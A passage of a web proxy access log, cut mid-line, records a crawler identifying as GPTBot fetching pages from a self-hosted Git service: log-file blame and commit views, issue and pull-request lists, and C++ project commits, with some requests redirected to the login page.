GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 31349] [Gzip 16.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 40645] [Gzip 16.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 142216] [Gzip 26.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10631] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 64488] [Gzip 18.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 551096] [Gzip 22.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:54:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:54:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:54:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:54:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:54:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:54:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:54:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:54:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:54:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:55:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10449] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10629] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10063] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10633] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10449] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10223] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10224] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10114] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject" [Client 74.7.227.38] [Length 212891] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:16:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject" [Client 74.7.227.38] [Length 362250] [Gzip 16.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" -[17/Feb/2026:16:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" -[17/Feb/2026:16:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" -[17/Feb/2026:16:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" -[17/Feb/2026:16:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11797] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" -[17/Feb/2026:16:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 